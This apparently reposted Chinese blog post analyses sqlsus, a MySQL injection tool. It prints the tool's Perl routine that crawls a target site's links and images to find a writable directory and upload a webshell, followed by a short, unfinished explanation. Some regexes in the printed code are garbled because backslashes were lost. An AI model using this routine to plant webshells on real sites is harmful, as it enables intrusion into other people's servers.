您的位置:首页 > 数据库

sqlsus上传自动搜索可写目录的实现代码分析

2011-11-29 21:33 295 查看
转载:http://www.52harry.com/program/python/2011-11-08/493.html

sqlsus是一个比较不错的mysql注射工具,感觉最好用的两点就是注射获取数据速度非常快,另外一个最大的特点就是自动搜索可写目录,上传webshell,我们找到他的功能实现代码进行分析

# TODO handle src tags rather than just img src

sub upload_uploader {

if (@conf::upload_directories) {

for my $dir (@conf::upload_directories) {

if (&try_to_upload_uploader($dir)) {

return 1;

}

}

} else {

my @urls;

push @urls, $conf::url_start, $conf::url_start, $conf::url_base;

# without script

$urls[0] =~ s#/[^/]+$##;

print STDERR "[+] Crawling the website for candidate directories at max depth $conf::max_depthn";

my $depth = 0;

my $mech = WWW::Mechanize->new();

my @fetched_urls = ();

my @directories = qw(/);

while ($depth != $conf::max_depth) {

$depth++;

for my $url (@urls, @directories) {

return 0 if $main::interrupt;

next if grep {$_ eq $url} @fetched_urls;

push @fetched_urls, $url;

next if $url =~ /.(gif|jpg|jpeg|png|bmp|css)$/i;

if ($conf::debug) { print STDERR "[$depth] Fetching $url : " }

$mech->get( "$url" );

sleep($conf::sleep_between_hits);

if ($conf::debug) { print STDERR $mech->response()->code . " (" . $mech->response()->message . ")n" }

if (not $mech->response()->is_success) {

next;

}

# parse all links / add them to the download queue if not seen yet

for my $link ($mech->find_all_links()) {

my $url = $link->url_abs()->abs;

# only consider local links

next unless ($url =~ /^$conf::url_base/);

my $url_without_args = $url;

$url_without_args =~ s/?.*//;

# if the url has not been fecthed yet, and is not in the "to fetch" list

push(@urls, "$url") unless grep(/^$url_without_args/, @urls);

# extract absolute directory

$url =~ s/^$conf::url_base///;

$url =~ s#/[^/]*$#/#;

# and stack "new" directories

while ($url =~ m#/.+$#) {

if (not grep($_ eq $url, @directories)) {

if (&try_to_upload_uploader($url)) {

return 1;

} else {

push(@directories, $url);

}

}

$url =~ s#/[^/]+(/?)$#$1#;

}

}

# parse all images to get more directories

#TODO parse src='' SRC="" etc.. to get directories from javascript, movies..

for my $image ($mech->find_all_images) {

my $url = $image->url_abs();

# print "[IMG] $urln";

# only consider local links

next unless ($url =~ /^$conf::url_base/);

# remove everything after last /

$url =~ s//[^/]+$///;

# remove $conf::url_base

$url =~ s/^$conf::url_base///;

$url =~ s#/[^/]*$#/#;

# and stack "new" directories

while ($url =~ m#/.+$#) {

if (not grep($_ eq $url, @directories)) {

if (&try_to_upload_uploader($url)) {

return 1;

} else {

push(@directories, $url);

}

}

$url =~ s#/[^/]+(/?)$#$1#;

}

}

}

}

}

}

上面是功能实现的核心代码,我们逐步进行拆解分析

恼火…………,吃槟榔吃high了,具体分析再说,简单的说一下,

就是搜集所有的链接地址,然后分析文件夹的深度,查找所有的图片文件所在的文件夹,然后去掉http://这样的协议头,对比本地的根目录文件夹,确定图片文件夹在服务器上的实际目录。这个是确定服务器的根目录的可写目录途径*
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: 
相关文章推荐